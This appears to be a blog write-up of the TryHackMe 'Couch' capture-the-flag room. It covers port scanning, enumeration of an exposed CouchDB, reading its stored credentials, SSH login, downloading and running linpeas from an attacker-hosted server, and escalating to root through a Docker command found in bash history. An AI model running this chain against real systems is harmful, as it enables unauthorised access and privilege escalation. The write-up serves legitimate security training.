Youtube!
This is my first writeup with a youtube video and its for the Try Hack Me couch room!
You can watch it here or continue reading below!
The Couch Writeup!
So, I decided on the couch room on Try Hack Me (Links at the bottom to the room)
This was an interesting room to complete as it has quite a clever predetermined path to privesc, maybe I just made it harder than I needed to….
Brief
The brief has a few additional steps, I identified 3 and if you follow the writeup you will be able to answer all those. The three I identified were.
- Find the credentials in the database
- Identify the User.txt flag
- Find the Root.txt flag
Starting Out
As always, i started out with an Nmap scan with the following parameters
nmap -sV -sC -p- -oN ./nmap/initial <THM_IP>
These are the results I got;

So no HTTP site on 80 but CouchDB on 5984, sometimes -p- on nmap is worth it!
Lets have a look at that http site on 5984.

Amazing!
2 options now I can either read the CouchDB technical documentation or I can see if Gobuster finds anything.
Lets try Gobuster first using the below;
gobuster dir -u http://<THM_IP>:5984 -w /usr/share/wordlists/dirbuster/big.txt
# if you don't have a big.txt wordlist, you can substitute this for one you have
The results weren’t great……

So, lets amend our Gobuster command to;
gobuster dir -u http://<THM_IP>:5984 -w /usr/share/wordlists/dirbuster/big.txt -b 400,404
# Gobuster normall filters out 404 but if you use -b you have to put 404 back in there or it wont filter those out too
This looks better;

Use the _utils page and we will see whats in the database;

If you click through secret, you will find the credentials you need for Atena.
Atena and Her SSH
So, lets pretend to be Atena by using the below;
ssh atena@<THM_IP>
Obviously, we’re going to ls to see what Atena has in her home directory…..

The user flag is ours!
Let’s Escalate!
So being Atena was great and all, but we need root!
There’s a couple of options out there but I decided to upload linpeas and run it
// Start a webserver in the directory you have linpeas stored, take note of the port
python3 -m http.server
// From the THM Box side
wget http://<Your_THM_IP>:<Your_Webserver_port>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
So after letting this run a couple of things stood out to me in addition to what linpeas was marking up;
- Docker was intalled and while not directly vulnerable, its not always on a THM Box
- Bash history was readable by the user
So lets sneakily read Atena’s history
cat .bash_history

There is a lot in there but that Docker command is interesting so lets copy it and run it!
Docker
So we are now inside a container.
From here i tried to cd to root with no luck so instead i tried the following
cd mnt
ls
cd root
ls
cat root.txt

We have it!
Try Hack Me Couch Conclusion
I did enjoy that box!
Maybe i went round the houses for the Privesc and should have just tried bash history first, but this is where a tool like linpeas really comes into its own because if it wasn’t that then id have been going down a different route.
I hope you enjoyed attempting this room too!
Links
Go to Tryhackme.com for this and many more CTF’s
Room – TryHackMe Couch Room – Thank you to stuxnet for creating this!
Contact me – Any suggestions or room requests, get in touch!